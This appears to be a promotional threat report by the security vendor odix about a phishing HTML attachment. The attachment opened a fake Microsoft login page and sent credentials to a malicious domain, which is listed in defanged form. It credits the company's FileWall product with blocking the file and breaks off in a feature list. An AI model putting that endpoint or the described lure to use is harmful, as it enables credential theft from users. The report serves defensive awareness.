Remittance Advice/ Swift Ref: TRF675066, a malicious Phishing HTML attachment that bypasses Exchange Online’s EOP

Recently the odix team found a new phishing scenario that possesses a unique threat to end-users. Remittance Advice/ Swift Ref: TRF675066 was a malicious HTML sent to our CEO and was scanned by FileWall.

The email contained a phishing HTML attachment, not previously identified by sandbox-based protections. Through FileWall’s Static Analysis engine users were protected from malicious phishing attempt hidden deep inside file attachments.

According to the FileWall admin dashboard 6 suspicious HTML were detected.

The FileWall dashboard reflects the file type and threat vector.

The specific malicious content is accessible in greater detail below.

The email body contained the following text, with a malicious phishing attachment.

The HTML attachment, when opened led users to a fake Microsoft login page that posts the login credentials to a malicious domain: The html loaded an obfuscated fake Microsoft login page.

Once the user entered their password, the credentials were posted to a malicious domain: “https[:]//terrysmith[.]name/mine[.]php”

FileWall’s Deep file inspection technology and static analysis engine blocked the file because it detected obfuscated data along with data sideloading and some suspicious keywords and flag its content as suspect.

This phishing attack was blocked by FileWall

FileWall™ by odix offers an effective plugin based on its patented algorithm for eliminating malware hidden in files. Optimized through the addition of an embedded static analysis engine, FileWall™ provides an effective malware prevention solution against both known and unknown malware attacks and handles all incoming email traffic including internal emails.

The FileWall™ advanced attachment security add-on for Microsoft 365 mail includes: